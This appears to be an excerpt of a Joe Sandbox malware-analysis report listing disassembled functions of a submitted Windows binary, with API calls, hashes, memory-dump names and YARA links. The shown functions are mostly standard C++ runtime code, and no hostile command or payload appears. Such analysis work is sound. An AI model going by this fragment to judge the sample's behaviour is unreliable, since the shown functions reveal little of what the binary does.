                                                    • Instruction ID: 96102c6a4df4e9862eabbc2e06d0317424a92acaa1a7a0886d1cde8d78b3f34d
                                                    • Opcode Fuzzy Hash: a1d647830a22bdf2039a418ce4630a00b78d7c2347731da26d1f880ae6fd39f4
                                                    • Instruction Fuzzy Hash: FC41AC72A087118FC330DF68C8C0A5EB7E1AF94750F15455DF899AB222DB35ED0ACB96
                                                    Function 00C63570 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C635D1
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C63618
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636DA
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636DF
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00C636E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name$false$true
                                                    • API String ID: 164343898-1062449267
                                                    • Opcode ID: aabe385330899368c3cb36ce663ebb14e900ac3b177d737bcde85882bc11403e
                                                    • Instruction ID: 654f647b97bf82ed6733f8213b1c9a25cbefaa90afd8e3a8e29aa8cf2ee5cdc4
                                                    • Opcode Fuzzy Hash: aabe385330899368c3cb36ce663ebb14e900ac3b177d737bcde85882bc11403e
                                                    • Instruction Fuzzy Hash: 3B418C71605381AFC730EF65C881B5ABBE0BF94700F44482EF49997352EB75DA09CB56
                                                    Function 00C68FDB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C68FE1
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00C68FEF
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C69000
                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C69011
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                    • API String ID: 667068680-1247241052
                                                    • Opcode ID: 68437afaa186003ec991a20168300bfa773356dde92115ca0c0a4c54e26cbcfe
                                                    • Instruction ID: e3f372834e3e51099f9752676db0b6657ab0a84c8de0990e0cfaaf33a9650914
                                                    • Opcode Fuzzy Hash: 68437afaa186003ec991a20168300bfa773356dde92115ca0c0a4c54e26cbcfe
                                                    • Instruction Fuzzy Hash: 9DE0EC31591710AF8B01BF74FC0DFAD3EA8FA067063590226F501D26B0DBB2440ACB58
                                                    Function 00C6C798 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • type_info::operator==.LIBVCRUNTIME ref: 00C6C8B7
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00C6C9C5
                                                    • _UnwindNestedFrames.LIBCMT ref: 00C6CB17
                                                    • CallUnexpected.LIBVCRUNTIME ref: 00C6CB32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2751267872-393685449
                                                    • Opcode ID: 520855d6b0a220d4fd2199f4fd5ac4df813794cfa7062090306fa2fbea21681b
                                                    • Instruction ID: 43a21aebc3c46932762565ff9f5ba770967609df9b206472b40acaa612ca1f63
                                                    • Opcode Fuzzy Hash: 520855d6b0a220d4fd2199f4fd5ac4df813794cfa7062090306fa2fbea21681b
                                                    • Instruction Fuzzy Hash: 4CB15971800209EFCF34EFA4C8C19BEB7B5FF58310B14416AE8A56B252D731EA51EB91
                                                    Function 00C7C5D8 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3907804496
                                                    • Opcode ID: c93e5d839631f2e213ff8fbcaffd4a118c9761fdc3150d7957e7f1630d6fc305
                                                    • Instruction ID: 1f43e6d2e4fbe873fd908ca60499e34c029583bec628c0981e7ffdffa0f16a60
                                                    • Opcode Fuzzy Hash: c93e5d839631f2e213ff8fbcaffd4a118c9761fdc3150d7957e7f1630d6fc305
                                                    • Instruction Fuzzy Hash: B4B1E274A0420AAFDB11DFA9D8C1BADBBB1BF45300F14C15DE919AB292C7709E42DF61
                                                    Function 00C84E74 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$Info
                                                    • String ID:
                                                    • API String ID: 127012223-0
                                                    • Opcode ID: 856de0512d9a5c24aa139789f3b20043f88b6ed11b83983b1ec5cd346d4c46a8
                                                    • Instruction ID: 1a09d4472c18085bdc42188812422e8a9fbda30a46e0271ef64d5ef656153e07
                                                    • Opcode Fuzzy Hash: 856de0512d9a5c24aa139789f3b20043f88b6ed11b83983b1ec5cd346d4c46a8
                                                    • Instruction Fuzzy Hash: 2A712A32904606ABDF25BF948C81FAF7BBAAF45318F250019F928A7281D775DD00D7A9
                                                    Function 00C68C74 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C68CBD
                                                    • __alloca_probe_16.LIBCMT ref: 00C68CE9
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C68D28
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C68D45
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C68D84
                                                    • __alloca_probe_16.LIBCMT ref: 00C68DA1
                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C68DE3
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C68E06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                    • String ID:
                                                    • API String ID: 2040435927-0
                                                    • Opcode ID: 4a87573d620b8740ffc59f2be2fb17c2118b521102e7d7557892da91fd78f368
                                                    • Instruction ID: 86e31920b2fd018b894e6bf572005c78435adc761949964cacc0ed90e162e35e
                                                    • Opcode Fuzzy Hash: 4a87573d620b8740ffc59f2be2fb17c2118b521102e7d7557892da91fd78f368
                                                    • Instruction Fuzzy Hash: 0A51AF72500216AFEB309F61CC85FAF7BA9EF44744F144625F914AA190DF318E18DB60
                                                    Function 00C627A0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C627AD
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C627CB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C627EC
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6283C
                                                    • std::_Facet_Register.LIBCPMT ref: 00C62866
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C6287F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
                                                    • String ID:
                                                    • API String ID: 1858714459-0
                                                    • Opcode ID: bb6a4343347479058c3efec350a4b069609988f0cf094bd394ac74bcb48073a2
                                                    • Instruction ID: bd21036e065d7d593305dd8a7bbe08abbc4ac8d28709d2af74785d883a160ed7
                                                    • Opcode Fuzzy Hash: bb6a4343347479058c3efec350a4b069609988f0cf094bd394ac74bcb48073a2
                                                    • Instruction Fuzzy Hash: 1021C3329046118BC735DF14ECC4A5EB7A1FB58320F14055DE891572A2DB35AE0AC7C2
                                                    Function 00C6C42A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00C6C421,00C6AB5A,00C69AE6), ref: 00C6C438
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C6C446
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C6C45F
                                                    • SetLastError.KERNEL32(00000000,00C6C421,00C6AB5A,00C69AE6), ref: 00C6C4B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 8163a88616866c83efdbbe62394f93162fff87a766ee7c065f7a231cc1b7f9e6
                                                    • Instruction ID: 1e046b5b98bdff694214224b29f12ab48a1de57eb1423def11b9d9a7a3e35607
                                                    • Opcode Fuzzy Hash: 8163a88616866c83efdbbe62394f93162fff87a766ee7c065f7a231cc1b7f9e6
                                                    • Instruction Fuzzy Hash: 9601423260C722AEA63027F5FCD5F3E2684EF41B74320432FF924820E9EF158C026648
                                                    Function 00C7449E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BF955749,?,?,00000000,00C866D3,000000FF,?,00C7442E,?,?,00C74402,00000016), ref: 00C744D3
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C744E5
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00C866D3,000000FF,?,00C7442E,?,?,00C74402,00000016), ref: 00C74507
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0dce807759a67ac4bd75423a774bb2396eb1228fcc0508f3dbbc820192a503ad
                                                    • Instruction ID: 70699931322c23ac825b5b0849e38b3bf6bd3c008f815bf091bfa36aa1fcfc82
                                                    • Opcode Fuzzy Hash: 0dce807759a67ac4bd75423a774bb2396eb1228fcc0508f3dbbc820192a503ad
                                                    • Instruction Fuzzy Hash: 6401A231944629AFDB169F50DC09FAEBBB8FB04B15F004225F821A26D0DF749904CB88
                                                    Function 00C7A0C3 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 00C7A14A
                                                    • __alloca_probe_16.LIBCMT ref: 00C7A20B
                                                    • __freea.LIBCMT ref: 00C7A272
                                                      • Part of subcall function 00C77686: HeapAlloc.KERNEL32(00000000,00000001,?,?,00C69E48,?,?,?,?,?,00C62D6E,00000001,?), ref: 00C776B8
                                                    • __freea.LIBCMT ref: 00C7A287
                                                    • __freea.LIBCMT ref: 00C7A297
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                    • String ID:
                                                    • API String ID: 1096550386-0
                                                    • Opcode ID: ca82d8eab4747352c95fc355fb49d99f21224b5760ea9197ed171af8dfadc8d0
                                                    • Instruction ID: 14b4479add721ca7935b3f83c8c576053468884058b0ca56850835a5653f92b1
                                                    • Opcode Fuzzy Hash: ca82d8eab4747352c95fc355fb49d99f21224b5760ea9197ed171af8dfadc8d0
                                                    • Instruction Fuzzy Hash: A851C272600206AFEF259FA5CC81EBF3BA9EF84750F158128FD1CD6151EA32CD5097A2
                                                    Function 00C67B24 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C67B2B
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C67B35
                                                      • Part of subcall function 00C63260: std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                      • Part of subcall function 00C63260: std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    • codecvt.LIBCPMT ref: 00C67B6F
                                                    • std::_Facet_Register.LIBCPMT ref: 00C67B86
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C67BA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                    • String ID:
                                                    • API String ID: 712880209-0
                                                    • Opcode ID: 7f2395eb1004004c791a8e112a38439ee36e84b0fb4311076f6f8230d47e3a15
                                                    • Instruction ID: ec79afdca3acf719dc65fa56f4425ce393a562f05bacb436e9ecab0f189c77b0
                                                    • Opcode Fuzzy Hash: 7f2395eb1004004c791a8e112a38439ee36e84b0fb4311076f6f8230d47e3a15
                                                    • Instruction Fuzzy Hash: 6911E6B19046189FCB24EF64C885BAE77B5EF84724F24064DF441A7391DFB49E019B91
                                                    Function 00C66775 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C6677C
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C66786
                                                      • Part of subcall function 00C63260: std::_Lockit::_Lockit.LIBCPMT ref: 00C6326F
                                                      • Part of subcall function 00C63260: std::_Lockit::~_Lockit.LIBCPMT ref: 00C6328A
                                                    • codecvt.LIBCPMT ref: 00C667C0
                                                    • std::_Facet_Register.LIBCPMT ref: 00C667D7
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C667F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                    • String ID:
                                                    • API String ID: 712880209-0
                                                    • Opcode ID: 41146e64fbd29cf9d88b3b44204540318c9c3fec4571909690081d42d5dc9e0d
                                                    • Instruction ID: 5ce0904d1e4b3e12009ee3b25ebc1492d527f6da69f861a0c301bf34c7536ee1
                                                    • Opcode Fuzzy Hash: 41146e64fbd29cf9d88b3b44204540318c9c3fec4571909690081d42d5dc9e0d
                                                    • Instruction Fuzzy Hash: 6211E4B1900255DFCB20EF68C9856AE77F4FF84320F24050DF451A7282DB749A01DB81
                                                    Function 00C65F4A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3.LIBCMT ref: 00C65F51
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C65F5C
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C65FCA
                                                      • Part of subcall function 00C660AD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C660C5
                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00C65F77
                                                    • _Yarn.LIBCPMT ref: 00C65F8D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                    • String ID:
                                                    • API String ID: 1088826258-0
                                                    • Opcode ID: 931d188191587e7ca6842e431d74deecf82292913e330303f270cb55c7efceb6
                                                    • Instruction ID: 6efdd7158f95f884cb4a0ef51cbc13d4c4f6b8f8517f82e952a11de4c5cbe6a6
                                                    • Opcode Fuzzy Hash: 931d188191587e7ca6842e431d74deecf82292913e330303f270cb55c7efceb6
                                                    • Instruction Fuzzy Hash: 58018F75A01A209BCB26EF60D9C9B7D7BB5FF85350F244018E85657381CF386E06EB89
                                                    Function 00C6D572 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00C6D523,00000000,00000001,00CC997C,?,?,?,00C6D6C6,00000004,InitializeCriticalSectionEx,00C89F88,InitializeCriticalSectionEx), ref: 00C6D57F
                                                    • GetLastError.KERNEL32(?,00C6D523,00000000,00000001,00CC997C,?,?,?,00C6D6C6,00000004,InitializeCriticalSectionEx,00C89F88,InitializeCriticalSectionEx,00000000,?,00C6D47D), ref: 00C6D589
                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00C6C393), ref: 00C6D5B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: 6654333e6e2514067172fca468357cd35cc953a9131928de505fc3748984fc96
                                                    • Instruction ID: b0fa4a84725192b803a7e46df7a741bc681e8d6ee5292e49ede9d426b6f05202
                                                    • Opcode Fuzzy Hash: 6654333e6e2514067172fca468357cd35cc953a9131928de505fc3748984fc96
                                                    • Instruction Fuzzy Hash: A1E01A70784304BAEF302FA0EC46B593B559B10B54F544020FA0EA88A1DBB5AA58AB88
                                                    Function 00C7A777 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(BF955749,00000000,00000000,00000000), ref: 00C7A7DA
                                                      • Part of subcall function 00C7CD2A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C7A268,?,00000000,-00000008), ref: 00C7CDD6
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C7AA35
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C7AA7D
                                                    • GetLastError.KERNEL32 ref: 00C7AB20
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
